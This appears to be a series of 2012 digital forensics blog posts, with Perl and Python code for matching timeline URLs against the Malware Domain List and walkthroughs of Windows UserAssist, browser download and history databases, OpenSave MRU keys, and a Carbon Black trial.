Friday, 28 December 2012

Timeline Pivot Points with the Malware Domain List

I thought, as it's the end of the year, it would be a good opportunity to briefly break away from the SANS Forensic Artifact posts I've been writing. In my own time I've been playing around with some code that parses a timeline file for any URLs discovered within it and then compares them with the URLs listed in the Malware Domain List (MDL).

If a match is found it lists the malicious URL from the MDL and the description which explains why that URL has been listed. I'm creating this to make it easier to find the "Pivot Points" which both Rob Lee and Harlan Carvey mention, and which serve as an anchor for our investigations. Pivot points can come in a variety of forms, both verbal and technical, and will hopefully give us a starting point or area of focus. The less time we spend poking around an image, the more time we can spend providing value to our customers or employers.

So to get started I first downloaded a copy of the Malware Domain List. You can get yourself a copy at the following location -> Once you have the list, create an SQLite database and import the MDL into it. You can easily install the Firefox addon SQLite Manager, which is the method I've used.
  1. Create a new database in the same directory as the script called malwaredomainlist.sqlite
  2. Import the MDL from CSV into a new table called mdomain
  3. See screenshot below for appropriate field names to use for the table
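If you'd prefer to script steps 1 and 2 rather than use SQLite Manager, the setup can be sketched in a few lines of Python. This is a rough sketch only: the database, table and field names match the ones I've used, but the CSV column positions are an assumption about your MDL export, so adjust them to suit.

```python
import csv
import sqlite3

def build_mdl_db(csv_path, db_path="malwaredomainlist.sqlite"):
    """Create the mdomain table and load an MDL CSV export into it.

    Assumes the date, domain, IP and description sit in the first
    four CSV columns -- adjust the indexes to match your export.
    """
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE IF NOT EXISTS mdomain "
                "(date TEXT, domain TEXT, ip TEXT, description TEXT)")
    with open(csv_path, newline="", encoding="utf-8", errors="replace") as fh:
        rows = [(r[0], r[1], r[2], r[3]) for r in csv.reader(fh) if len(r) >= 4]
    con.executemany("INSERT INTO mdomain VALUES (?,?,?,?)", rows)
    con.commit()
    return con
```

Note that re-running this simply appends another copy of the list, so wipe the table first if you're refreshing.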

Above are some basic steps to get you up and running, and if you review the screenshot you'll see the table and field names I've used. If you decide to use the tool that I post you will want to ensure that your filename, table name and field names are the same as mine, otherwise you'll generate some errors.

I had a few attempts at tackling how I would compare the domains discovered within my timeline to the ones within the MDL. I felt the only way to do this accurately would be to reduce both URLs down to their domain name including the suffix / TLD / gTLD. I had a few attempts at coding this myself but always found that some domain would eventually break the script. In the end I went with a pre-packaged module -> To install the module, type the following command from a command prompt (ensuring, obviously, that you've installed Perl in the first place). Below is the command plus the output.

 ppm install Domain::PublicSuffix  
 Downloading Domain-PublicSuffix-0.07...done  
 Downloading Data-Validate-Domain-0.10...done  
 Downloading Net-Domain-TLD-1.69...done  
 Unpacking Domain-PublicSuffix-0.07...done  
 Unpacking Data-Validate-Domain-0.10...done  
 Unpacking Net-Domain-TLD-1.69...done  
 Generating HTML for Domain-PublicSuffix-0.07...done  
 Generating HTML for Data-Validate-Domain-0.10...done  
 Generating HTML for Net-Domain-TLD-1.69...done  
 Updating files in site area...done  
  11 files installed  

The above module makes use of a Firefox dat file which it uses to identify the TLD / suffix of the domain. So in order for the script to work you'll also need to download this dat file, which you can find at the following -> and save it within the same directory as the script.
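To give you a feel for what Domain::PublicSuffix does with that dat file, here's a minimal Python sketch of the same idea: reduce a hostname to its registrable domain by matching the longest known public suffix. The handful of suffixes here is a stand-in for the full effective_tld_names.dat, and the sketch ignores the file's wildcard and exception rules, so treat it as illustration only.

```python
def get_root_domain(host, suffixes):
    """Return the registrable domain (one label plus public suffix) for host.

    suffixes: a set of public suffixes, e.g. loaded from
    effective_tld_names.dat (comment/wildcard handling omitted here).
    """
    labels = host.lower().rstrip(".").split(".")
    # try the longest candidate suffix first
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in suffixes:
            if i == 0:
                return None  # the host *is* a public suffix
            return ".".join(labels[i - 1:])
    return None

# Tiny stand-in for the real suffix list
SUFFIXES = {"com", "org", "net", "co.uk", "com.au"}
```

So www.news.bbc.co.uk reduces to bbc.co.uk, which is the form both sides of the comparison are brought down to before matching.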

Now that we have our database sorted, I've created the following script. At this point it's still a work in progress and I haven't commented it very well. As always my code is provided "as is" and I take no additional support or responsibility for the output it provides. I'm no coding guru and always appreciate feedback on a better or more efficient way of doing things, so feel free to shout out.

#! c:\perl\bin\perl.exe
use strict;
use Domain::PublicSuffix;
use DBI;
use Getopt::Long;
use Regexp::Common qw /URI/;
use URI;
use List::MoreUtils qw/ uniq /;

my %config = ();
GetOptions(\%config, qw(file|f=s system|s=s user|u=s help|?|h));
if ($config{help} || ! %config) {
    _syntax();
    exit 1;
}
die "You must enter a path.\n" unless ($config{file});
#die "File not found.\n" unless (-e $config{file} && -f $config{file});

my $file = $config{file};
my @uniq_domains;
my $suffix = new Domain::PublicSuffix ({
    'data_file' => 'effective_tld_names.dat'
});

# Pull every http(s) URL out of the timeline and reduce it to its root domain
open( my $fh, '<', $file ) or die "Can't open $file: $!";
while ( my $line = <$fh> ) {
    my @url = $line =~ m/($RE{URI}{HTTP}{-scheme => qr(https?)})/g;
    foreach my $u (@url) {
        my $host = URI->new( $u )->host;
        push @uniq_domains, getDomain($host);
    }
}
close $fh;

# Compare each unique root domain against the MDL table
my $db = DBI->connect("dbi:SQLite:dbname=malwaredomainlist.sqlite","","")
    || die( "Unable to connect to database\n" );
foreach ( uniq @uniq_domains ) {
    next unless $_;
    my $all = $db->selectall_arrayref(
        "SELECT domain,description FROM mdomain WHERE domain LIKE ?",
        undef, "%$_%" );
    foreach my $row (@$all) {
        my ($maldomain,$description) = @$row;
        # strip any path and port so the MDL entry reduces to a bare host
        my @splitdomain = split('/',$maldomain);
        @splitdomain = split(':',$splitdomain[0]);
        my $tempmdomain = getDomain($splitdomain[0]);
        if ($_ eq $tempmdomain) {
            print $_.",".$maldomain.",".$description."\n";
        }
    }
}

sub getDomain {
    return $suffix->get_root_domain($_[0]);
}

sub _syntax {
    print << "EOT";
Produce list of malware domain hits from timeline output
-f file..................path to timeline file
-h ......................Help (print this information)
**All times printed as GMT/UTC
copyright 2012 Sploit
EOT
}

At this point if you run a command such as the following:

 malwaredomainlist -f timeline.csv > output.txt  

You'll be presented with output in CSV format (assuming my instructions made sense) where the fields presented are the domain in question, the complete malware domain URL and the description/comments. Here is a sample output:

 ,|,RFI,,RFI,,RFI,,RFI,,Mebroot calls home,,Rogue,,compromised site directs to exploits  

As you can see from the above there are some URLs which will consistently generate false positives. My script grabs the unique URLs listed within a timeline, and you'll almost always have some of these common domains listed.
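One way to cut those false positives down is to apply a small whitelist before the database lookup. A trivial sketch — the domains listed are just examples of entries you might decide are benign for your own environment:

```python
# Example whitelist -- populate with domains you have judged benign
# that still trigger MDL matches (shared hosters, big CDNs, etc.).
WHITELIST = {"google.com", "googleusercontent.com", "amazonaws.com"}

def filter_candidates(domains, whitelist=WHITELIST):
    """Drop empty and whitelisted root domains before querying the MDL table."""
    return [d for d in domains if d and d not in whitelist]
```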

At this point I'm not sure of the value of this tool. It's fairly quick to run, and if you find yourself with a massive timeline file and you're not sure where to start then this might potentially be your next best bet. While I'm tweaking the code I haven't created the executable version of it yet; however, I have uploaded the code to my Google code repository to save you any issues with copying the source above.

Hopefully you get some value out of the tool; please let me know if you have any success with using it. In the meantime I'll continue to tweak and update the code. At this point it would be nice to have an option to download a fresh MDL and update the database. This wouldn't take long to do manually, but it would be nice for it to be automatic.
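As a sketch of what that automation might look like in Python: fetch the latest export, wipe the stale rows and re-import. The URL is a placeholder (point it at whichever MDL export you use), and the column layout is the same assumption as earlier in this post.

```python
import csv
import io
import sqlite3
import urllib.request

MDL_CSV_URL = "https://.../export.csv"  # placeholder -- set to the MDL CSV export you use

def refresh_mdl(db_path="malwaredomainlist.sqlite", csv_text=None):
    """Replace the contents of mdomain with a fresh MDL export.

    Pass csv_text directly (handy for testing), or leave it None
    to fetch MDL_CSV_URL over the network.
    """
    if csv_text is None:
        csv_text = urllib.request.urlopen(MDL_CSV_URL).read().decode("utf-8", "replace")
    rows = [(r[0], r[1], r[2], r[3])
            for r in csv.reader(io.StringIO(csv_text)) if len(r) >= 4]
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE IF NOT EXISTS mdomain "
                "(date TEXT, domain TEXT, ip TEXT, description TEXT)")
    con.execute("DELETE FROM mdomain")  # wipe the stale list first
    con.executemany("INSERT INTO mdomain VALUES (?,?,?,?)", rows)
    con.commit()
    return con
```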

Thursday, 27 December 2012

SANS Forensic Artifact 6: UserAssist

I'm a little late to say this but firstly Happy Christmas to my readers out there. I've been fortunate enough to have a little time off but still find myself working the Christmas / New Year period. I hope some of you have more time off and can catch up on some of those tasks you've been avoiding.

For today we're moving onto a new category which I think everybody will find of interest: Program Execution. There have been a huge number of posts on these artifacts and just how valuable they can be. Once again we'll attempt to create a few of the artifacts in different ways and see how that is reflected in the output of our tools.

I still haven't forgotten about the artifacts we've missed so far and I'm currently working on some posts to cover those so that I have a complete series.

GUI-based programs launched from the desktop are tracked in the launcher on a Windows System.
All values are ROT-13 Encoded
  • GUID for XP 
    • 75048700 Active Desktop 
  • GUID for Win7 
    • CEBFF5CD Executable File Execution
    • F4E57C4B Shortcut File Execution
  • Program Locations for Win7 Userassist
    • ProgramFilesX64 6D809377-…
    • ProgramFilesX86 7C5A40EF-…
    • System 1AC14E77-…
    • SystemX86 D65231B0-…
    • Desktop B4BFCC3A-…
    • Documents FDD39AD0-…
    • Downloads 374DE290-…
    • UserProfiles 0762D272-…
Let's first take a look at what we see in my UserAssist registry key so we understand what our tool must export and parse, and so we can understand which applications have been launched and from where. I browsed to "NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" and found the following.

Within each of the Count keys are a number of values which, as mentioned above, are ROT13 encoded. To the human eye they don't make much sense, but once we decode them we'll easily see what they mean. To give you a feel for what the values look like compared to the decoded versions, see the following output. I have grabbed a sample value from my own computer where the first line is the ROT13 value and the second line is the decoded value.

 P:\Cebtenz Svyrf (k86)\Zbmvyyn Sversbk\bzav.wn  
 C:\Program Files (x86)\Mozilla Firefox\omni.ja  
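ROT13 only rotates the letters A–Z, so digits, colons, parentheses and backslashes pass through unchanged — that's why "(k86)" still looks almost readable. Decoding is a one-liner; here's the same sample value run through Python's stdlib rot_13 codec:

```python
import codecs

encoded = r"P:\Cebtenz Svyrf (k86)\Zbmvyyn Sversbk\bzav.wn"
print(codecs.decode(encoded, "rot_13"))
# C:\Program Files (x86)\Mozilla Firefox\omni.ja
```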

You get the picture of what we are dealing with, and as mentioned above this is just a sample of what I have in mine. You'll notice that there are a number of values with UEME prefixing a word. These can also add context to how an application may have been run. I've attempted to find a full list of these for both Windows 7 and Windows XP, however I've only been able to find bits and pieces. The following list is taken from Didier Stevens' blog at the following location (here).
In Windows 7 they've significantly reduced the number of these values, as you can see below in the comparison. Many of them are self-explanatory and I won't be going into each one for this particular tutorial.

 Windows 7  
 XP DLL (version 6.00.2900.3157):  

So let's try to generate some of our own values and see how they show up within the output of RegRipper. To get started I began by running procexp.exe from the Sysinternals suite. I picked this application because it is GUI based and it would be easy for me to copy it to different locations on my computer. I'd then once again use a combination of HoboCopy (to rip my active registry hive) and RegRipper to rip the UserAssist registry key and examine the contents. I ran procexp.exe from four different places: the Desktop, the root of my username folder, Documents, and finally from within the x64 Program Files location.

I ran the following command for HoboCopy

 HoboCopy.exe c:\Users\username c:\tmp\ ntuser.dat  

Then the following for RegRipper

 rip.exe -r c:\tmp\ntuser.dat -p userassist2 > c:\tmp\userassist.txt  

The above commands produced the following output

 Thu Dec 27 07:31:20 2012 Z  
  {6D809377-6AF0-444B-8957-A3773F02200E}\procexp.exe (1)  
 Thu Dec 27 07:30:57 2012 Z  
  C:\Users\username\Documents\procexp.exe (1)  
 Thu Dec 27 07:30:37 2012 Z  
  C:\Users\username\procexp.exe (1)  
 Thu Dec 27 07:30:11 2012 Z  
  C:\Users\username\Desktop\procexp.exe (1)  

As you can see from above most of them make sense, apart from the one we ran from within the x64 Program Files folder. I grabbed the code highlighted in red and Googled it. I found the following Microsoft site which explains each of the codes.
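A small lookup table saves the trip to Google each time. The sketch below maps the known-folder GUIDs that turned up in my own output to friendly locations; extend the dictionary from Microsoft's KNOWNFOLDERID list as you encounter others.

```python
import re

# Known-folder GUIDs seen in the UserAssist output above (a small subset)
KNOWN_FOLDERS = {
    "{6D809377-6AF0-444B-8957-A3773F02200E}": "%ProgramFiles% (x64)",
    "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}": "%ProgramFiles% (x86)",
    "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}": r"%windir%\System32",
    "{F38BF404-1D43-42F2-9305-67DE0B28FC23}": "%windir%",
}

def expand_known_folder(path):
    """Replace a leading known-folder GUID with its friendly location."""
    match = re.match(r"(\{[0-9A-Fa-f-]{36}\})(.*)", path)
    if match and match.group(1).upper() in KNOWN_FOLDERS:
        return KNOWN_FOLDERS[match.group(1).upper()] + match.group(2)
    return path
```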

If you don't want to use the list I've posted above you can also do a find from within regedit and that will also find the code.

I decoded some of the values that I had listed in my output and placed them in the categories identified in the Microsoft article.

           {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\NOTEPAD.EXE (19)  
           {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe (5)  
           {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)  
           {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Notepad++\notepad++.exe (1)  
           {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office12\OUTLOOK.EXE (11)  

Hopefully I've explained the artifact well enough that you can take a better understanding away. This artifact has had countless articles written about it and its importance to your investigations. If you're not reviewing it then you should get started and make sure it's part of all your investigations.

Below are some key references that I've found while researching this artifact which you might find valuable.


Monday, 3 December 2012

SANS Forensic Artifact 5: Downloads.sqlite

I thought I'd get through this next artifact fairly quickly as I've already done some prior work with my Firefox script, which has an option available to parse the information out of the Downloads.sqlite database.

Please note that the last category should have been posted as Artifact 4, I've adjusted that, and therefore this makes Artifact number 5 on the poster.

SANS lists the following information within the poster within their File Download Category

Firefox has a built-in download manager application which keeps a history of every file downloaded by the user. This browser artifact can provide excellent information about what sites a user has been visiting and what kinds of files they have been downloading from them.

Location: Firefox
XP %userprofile%\Application Data\Mozilla\ Firefox\Profiles\<random text>.default\downloads.sqlite
Win7 %userprofile%\AppData\Roaming\Mozilla\ Firefox\Profiles\<random text>.default\downloads.sqlite
Downloads.sqlite will include:
• Filename, Size, and Type
• Download from and Referring Page
• File Save Location
• Application Used to Open File
• Download Start and End Times

While we are on this topic I thought it might be timely to touch on a recent post by Patrick Olsen over at the System Forensics blog. Patrick posted this week about a new tool he'd been working on named BARFF, which stands for Browser Artifact Recovery Forensic Framework. This tool is relevant to both my last and current post, and in particular the SANS poster category of "Browser Forensics". I haven't had the chance to download a copy myself as yet, but I encourage anyone to give it a go and provide him with your feedback.

In terms of the structure of the Downloads.sqlite database, and the other databases associated with Firefox, David Koepi has an excellent resource available here which will provide a strong starting point for those wanting to get into browser forensics. I thought it would be beneficial to first download a number of applications through Firefox and then, using SQLite Manager, a plugin for Firefox, run an initial query and take a look at what we see.

From the above screenshot there are a number of items we can use from a forensic perspective:
  • The name which contains the name of the executable
  • The source which contains the source of where the file was downloaded from.
  • The target file path
  • Start and end time which is what we'll use within our timelines
  • The state of the download as mentioned by David Koepi
    • "0"  in the state object indicates download is in progress
    • "1" in the state object indicates download is successful
    • "3" indicates download is cancelled
    • "4" indicates download is paused
  • We have a referer field for the referring site
  • Although not shown well in the above screenshot, two important fields are preferredApplication and preferredAction, which show the default application and action for opening the file 
    • "0" states that the file has been saved
    • "4" I believe states that it was opened with a preferred application, but more testing is required
    • In my tests I was unable to populate the preferredApplication field and again some further testing is required
  • Lastly, currBytes and maxBytes, which can be used to compare how large the file is with what has actually been downloaded.
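If you want to pull these fields yourself, note that Firefox stores the start and end times as PRTime — microseconds since the Unix epoch — so they need converting before they line up with the rest of a timeline. A rough Python sketch against the moz_downloads table (the table and column names are as documented for Firefox of this era; verify them against your own database):

```python
import sqlite3
from datetime import datetime, timezone

def prtime_to_utc(prtime):
    """PRTime is microseconds since the Unix epoch."""
    return datetime.fromtimestamp(prtime / 1_000_000, tz=timezone.utc)

def list_downloads(db_path):
    """Yield (name, source, start time UTC, state, currBytes, maxBytes)."""
    con = sqlite3.connect(db_path)
    rows = con.execute(
        "SELECT name, source, target, startTime, endTime, state, "
        "currBytes, maxBytes FROM moz_downloads ORDER BY startTime"
    )
    for name, source, target, start, end, state, cur, mx in rows:
        yield name, source, prtime_to_utc(start), state, cur, mx
```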
In my example in the screenshot above I cancelled the download of FTK 4.1, and that is reflected by the state of 3, while maxBytes lists it as -1. It's important to note that this database is updated to reflect the same view as the graphical downloads window. Should a user delete all of the entries, or remove individual downloads, then this will also remove them from the database. As well as the tool mentioned above I've also created a number of Perl scripts, and their converted executables, to parse this information. Let's take a look at how we'd run those tools and compare the output.

To run the command you can run something like the following; obviously be aware that your profile will be in a different location to mine.

 firefox.exe -d -p C:/Documents and Settings/username/Application Data/Mozilla/Firefox/Profiles/fd9zh9ag.default -s WORKSTATION -u USERNAME > c:\temp\events.txt  

Again this parses to Harlan's TLN timeline format, and you can then convert it with the script that Harlan provides and turn this into a spreadsheet for your analysis. The output is the following.

 1353362936|FIREFOX|WORKSTATION|USERNAME|dl:winscp511setup.exe src: cB:4854080 mB:4854080  
 1353364779|FIREFOX|WORKSTATION|USERNAME|dl:sav32sfx(1).exe src: cB:72805712 mB:72805712  
 1353364806|FIREFOX|WORKSTATION|USERNAME| src: cB:3656900 mB:3656900  
 1354486120|FIREFOX|WORKSTATION|USERNAME|dl:googletalk-setup.exe src: cB:1606064 mB:1606064  
 1354493698|FIREFOX|WORKSTATION|USERNAME|dl:FTK 4.1.0 Intl.iso src: cB:0 mB:-1  
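Each TLN line is simply pipe-delimited — epoch time, source, system, user, description — so if you want to massage the output yourself before it hits a spreadsheet, a few lines of Python will split and convert it (assuming the five-field layout shown above):

```python
from datetime import datetime, timezone

def parse_tln(line):
    """Split a TLN line into (UTC datetime, source, system, user, description)."""
    epoch, source, system, user, description = line.rstrip("\n").split("|", 4)
    when = datetime.fromtimestamp(int(epoch), tz=timezone.utc)
    return when, source, system, user, description
```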

Although Chrome is not specifically mentioned, I felt it was of equal importance in this category and therefore it was best I showed examples for both. Again with these examples it's important that when testing these tools you note the time that you download each of the files and confirm in the output, as we did in the last post, that your timeline produces the correct time, while at the same time understanding any conversions required from UTC to local time.

Again I opened the database, in this case the History file, using SQLite Manager.

In this case we don't have as much detail in the downloads table as we do with the downloads database within Firefox. Once again I ran a command similar to the one we used above, however this time using my Chrome script.

 chrome -d -p "C:\Documents and Settings\username\Local Settings\Application Data\Google\Chrome\User Data\Default" -s WORKSTATION -u USERNAME > c:\temp\chrome_events.txt  

The output is the following.

 1347264951|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\ChromeSetup (1).exe src: cB:739808 mB:739808  
 1354584249|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\sav32sfx (1).exe src: cB:72805712 mB:72805712  
 1354584279|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\googletalk-setup (1).exe src: cB:1606064 mB:1606064  
 1354584297|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\sav32sfx (2).exe src: cB:72805712 mB:72805712  

Well, I think I've discussed this topic enough. Again, it's not overly complex, but like everything you'll get a better return on your tools if you understand what they do, have some assurance that the output is as expected, and are aware of any adjustments you may need to make to ensure you're looking at the correct local time if required. If you're looking for the tools mentioned above that I've written, you can find them at the following location


Monday, 12 November 2012

SANS Forensic Artifact 4: Index.dat / Places.sqlite

You may be wondering why at this point we've moved on from artifact 1 to artifact 4. I spent some time thinking about how I wanted to discuss PST/OST files and Skype logs and felt I needed some more time to make those posts beneficial to everyone. This doesn't mean I won't be completing them, just that I'll be coming back to them after we explore some of the other artifacts first. The category for today is in the File Download category: Index.dat / Places.sqlite.

This should be a fairly easy category to post about as I've already posted some information and tools on how to parse this information.

SANS lists the following information within the poster.

Not directly related to “File Download”. Details stored for each local user account. Records number of times visited (frequency).
Location: Internet Explorer
XP %userprofile%\Local Settings\History\ History.IE5
Win7 %userprofile%\AppData\Local\Microsoft\Windows\History\History.IE5
Win7 %userprofile%\AppData\Local\Microsoft\Windows\History\Low\History.IE5
Location: Firefox
XP %userprofile%\Application Data\Mozilla\ Firefox\Profiles\<random text>.default\places.sqlite
Win7 %userprofile%\AppData\Roaming\Mozilla\ Firefox\Profiles\<random text>.default\places.sqlite

For today we can easily test the tools we have by browsing to certain sites and making a note of the time we viewed each site. When we run our tools we should be able to see the same time referenced by the tool. Other areas we can look at are what happens when we delete the history, and whether entries remain or are removed. Finally, I wanted to touch on some of the different entries you'll find within the index.dat file: URL / LEAK / REDR entries. I'll touch briefly on LEAK entries and link to a practical example of how one of these entries is created. This should help us in future incidents where we may be responding to systems that contain these artifacts.

First, let's start by browsing three websites in both Internet Explorer and Firefox, and I'll show how to parse the data using Harlan Carvey's open source Perl scripts and some of my own. We'll then convert these into TLN format and confirm our times against those we noted at the time we visited each site.

Here are the times I noted for each site I visited with both IE and Firefox. I know this is an unrealistic example because nobody ever uses Bing or Yahoo, right? A poor attempt at humour; stay with me, it can only get better.

Firefox - 10:12am - 10.12am - 10.13am

Internet Explorer - 10.13am - 10.14am - 10.15am

I started by parsing my index.dat file with the following command, which uses Harlan's urlcache script, to produce my initial events.txt file.

 -f "C:/Documents and Settings/username/Local Settings/History/History.IE5/index.dat" -l >> events.txt  

Following that I used my own script and ran the following command.

 -p "C:/Documents and Settings/username/Application Data/Mozilla/Firefox/Profiles/fd9zh9ag.default" -d >> events.txt  

Finally I ran Harlan's parse script to create my timeline file.

 -f events.txt -c > timeline.csv  

Let's compare our timeline results with the times we listed above. It's important to note that Harlan's timeline tools produce output in UTC. So depending on which time zone you are in, you may need to add a column and adjust the time to your local. I typically use a cell formula such as =A1+TIME(#,0,0), where '#' should be replaced with the number of hours you wish to add.
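The same adjustment can be done in code rather than in the spreadsheet — it's just adding your UTC offset to each timestamp, the equivalent of the cell formula with '#' filled in:

```python
from datetime import datetime, timedelta

def to_local(utc_time, offset_hours):
    """Shift a UTC timestamp to local time, like =A1+TIME(#,0,0)."""
    return utc_time + timedelta(hours=offset_hours)
```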

Firstly, I've already had some value out of checking my own tool: as you can see from the screenshot above, the Firefox history is in the wrong cell in comparison to Harlan's script. This is pretty easy to fix and I'll resolve it as soon as I can. It shouldn't affect your timelines in any way, however.

If we compare our results from the above

Firefox - 10:12am - tln: 10:12am - 10.12am - tln: 10.12am - 10.13am - tln:

Internet Explorer - 10.13am - tln: 10.13am - 10.14am - tln: 10.14am - 10.15am - - tln: 10:15am

So the above makes it pretty clear that our tools are producing the output we are expecting. Again this is all fairly basic at this point, but it shows that we now have an understanding of what the output of our tools looks like, and we're confident that they're producing the correct times for us to evaluate. This can be critical in terms of your incident response, as you do not want to miss an artifact because you thought your tool was providing the correct time when it was in fact off by a number of minutes or hours.

So what happens when we delete the history? I presume we lose this information and our timeline should be empty. Let's test the theory by clearing all of the IE history and four hours of Firefox history.

I ran the same commands as I did above and, as expected, the last data I had was from the previous time I used the workstation; there was nothing from the current day for Firefox. There was also no information for Internet Explorer at all. This is worthwhile keeping in mind while you're investigating: if the user has deleted their history you may need to go to other areas to identify sites visited. The guys at Volatility have written an excellent article on how to scan for Internet history through the use of one of their plugins.

Finally, some further discussion around LEAK entries within the IE history. What are LEAK entries? Well, Mike Murr from SANS defines them as follows:

"Essentially, a LEAK record is created when a cached URL entry is deleted (by calling DeleteUrlCacheEntry) and the cached file associated with the entry (a.k.a. "temporary internet file" or TIF) can not be deleted."

The above article discusses an easy way to create a LEAK entry. Mike also discusses in more detail, at the following link, how to create LEAK entries using some Python scripts which are unfortunately unavailable due to dead links, but you should be able to recreate them if required.

Again, if you would like access to my Firefox script you can grab it from the following


Wednesday, 10 October 2012

SANS Forensic Artifact 1: Open/Save MRU

As most of you will have seen by now, SANS posted a fantastic forensic poster for everybody to use which will "map a specific artifact to the analysis question that it will help to answer". Basically, what that means is that SANS has eight categories, each tied to an analysis question. For the question "Was the file opened?", for example, an analyst could review the 'File Opening / Creation' category, which lists artifacts that assist in determining whether files were opened.

We already know there are a number of tools available that can easily rip this information for us, such as RegRipper, and countless articles have been written about each of the artifacts listed. I find, however, that if you're purely reviewing the output of the tools to identify that a file was opened, or that a file was executed in some way, you may be missing the context of how that file was opened. Security analysts must ensure they have the technical understanding of each of the tools they run so they can explain the presence of an artifact, or lack thereof, within the output of their tools.

So I thought for my own benefit I'd create a series of blog posts going through each of the forensic artifacts and hopefully providing some examples, with screenshots, of how each artifact is created. Again, there is no better way to understand these tools than running them across your own workstation, where you understand exactly what you've done to complete each action. So with that being said, let's take a look at the first artifact SANS lists within the File Download category: Open/Save MRU.

SANS lists the following information within the poster.

In simplest terms, this key tracks files that have been opened or saved within a Windows shell dialog box. This happens to be a big data set, not only including web browsers like Internet Explorer and Firefox, but also a majority of commonly used applications.
XP NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
Win7 NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU
• The “*” key – This subkey tracks the most recent files of any extension input in an OpenSave dialog

• .??? (Three letter extension) – This subkey stores file info from the OpenSave dialog by specific extension

So how can we test the information we've been presented with above? The best and simplest way is to create two text files, SANS_ForensicArtifact1_MRU_1.txt and SANS_ForensicArtifact1_MRU_2.txt, and open one of them within Notepad through the Windows shell dialog box and the other just by double clicking and letting the associated application open the file. We can then note the differences in this key with before and after snapshots.

There are a number of ways to export the user hive from my current workstation. I decided to leverage one of my previous posts by using HoboCopy to rip it from my live machine. You could use tools such as the built-in regedit.exe, simply run a reg save query from the command line, or even use a tool such as FTK Imager to get this information.

I ran the following first so that I could have a comparison. Please note there are two separate commands in the dialog box below.

 FOR /F "tokens=*" %%G IN ('dir /b ^"C:\Documents and Settings\*^"') DO .\tools\hob\hobocopy.exe "c:\Documents and Settings\%%G" .\hives\%%G NTUSER.DAT

RegRipper command:

 rip.exe -r ..\..\hives\username\NTUSER.DAT -f ntuser >> username.txt

I searched the output of RegRipper for OpenSaveMRU and currently it only listed documents that I'd opened previously.

It's important to note from the above example that the first key is for objects opened that do not have an extension. The SANS reference below indicates the following: "The values stored in the key itself are items that do not have file extensions associated with them. Since most files have extensions, what often ends up here is auto-complete information".

The '*' key lists the last 10 files opened through the Windows dialog box regardless of extension. This can assist us with determining the opening order of those 10 files. Finally, there is a key for each of the extensions opened, and in this case we are only concerned with .txt so that we can use our example above. Let's open the file created above, and I'll also open a file with no extension from a secondary location, c:\blogmrulocation\test_noext.
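That opening order comes from the MRUListEx value inside each subkey: a run of little-endian 32-bit indexes, most recently opened first, terminated by 0xFFFFFFFF. A hedged sketch of decoding one in Python — this is the commonly documented layout, so verify it against your own hive:

```python
import struct

def parse_mrulistex(raw):
    """Decode MRUListEx: little-endian uint32 indexes, newest first,
    terminated by 0xFFFFFFFF."""
    order = []
    for (idx,) in struct.iter_unpack("<I", raw):
        if idx == 0xFFFFFFFF:
            break
        order.append(idx)
    return order
```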

As you can see from the screenshot, I've opened the file named SANS_ForensicArtifact1_MRU_1.txt. I also opened the file with no extension. For comparison I also double clicked on SANS_ForensicArtifact1_MRU_2.txt (i.e. did not open it through the Windows dialog box) so that we have something to compare against.

Let's run the script again to dump my hive and process it with RegRipper.

As we can see, the only files listed are the ones that we opened through the Windows dialog box, and there is nothing currently listed for SANS_ForensicArtifact1_MRU_2.txt. As I ran RegRipper with the -f ntuser option it parsed my ntuser.dat file against a number of different plugins and entered the output into the same text file. I decided to search for the second file, opened through double click, to see where we had references to it.

Although the above keys have nothing to do with my current post (although we'll hit on them later), it's important to note that our actions have modified another area within the system. So now we not only understand how to review items opened within the Windows dialog, but we also have some clues as to how we can identify items not opened by the dialog.

None of this information is rocket science by any means, and as listed in the SANS reference below, it has already been provided by Chad Tilbury, who has written an excellent article on these registry keys. What I do hope to provide from this post is some practical examples and comparisons between what we saw before and what we saw after the files were opened. The next time we run the tool, rather than accepting the output for what it is, we'll have a deeper understanding, and can hopefully revert back to our example to assist with gathering context in an incident where we do not have the luxury of knowing how or why a file was opened and therefore need to piece our view of the world back together.


Friday, 5 October 2012

The Carbon Black Test Drive

Many readers of this blog have most likely heard of Carbon Black by now. Carbon Black describes its product as "the world’s first ‘surveillance camera’ for computers" and highlights five key elements that it can monitor:

1. A record of execution
2. A record of file system modifications
3. A record of registry modifications
4. A record of new outbound network connections
5. A copy of every unique binary executed

We're all aware that antivirus and signature-based detection methods are no longer keeping up with the huge number of samples produced every day. Carbon Black recently posted an article called Second AV Study Reveals Small Window For Catching New Malware which caught my eye. The article highlights that using multiple AV products improves the odds of detecting a malicious sample, which makes sense to me. Since running multiple AV products on a single workstation is obviously a nightmare, they instead developed a plugin which uploads binaries to VirusTotal to leverage multiple AV engines.

Based on the above I thought it might be time to download the trial and better understand what this tool could do. Although some amazing articles have been written on Carbon Black (see the links below), nothing beats getting hands-on with the tool. Signing up for the trial was quick and easy, and before I knew it I had downloaded and installed the CB server. Upon logon I was presented with the following screen.

My test lab is fairly unsophisticated, but it should be enough to get a solid understanding of what CB can do. The next step was to create the client package so that I could install it on my Win XP test machine. As you can see from the screenshot it's very simple: you hit the 'generate' button and before you know it you have your client. I installed it on my machine and within minutes I started to see results in my console.

Carbon Black offers a number of plugins, some of which I've mentioned above. In particular I was most interested in the 'droppercheck', 'virustotal' and 'autoruns' plugins. See the screenshot below.

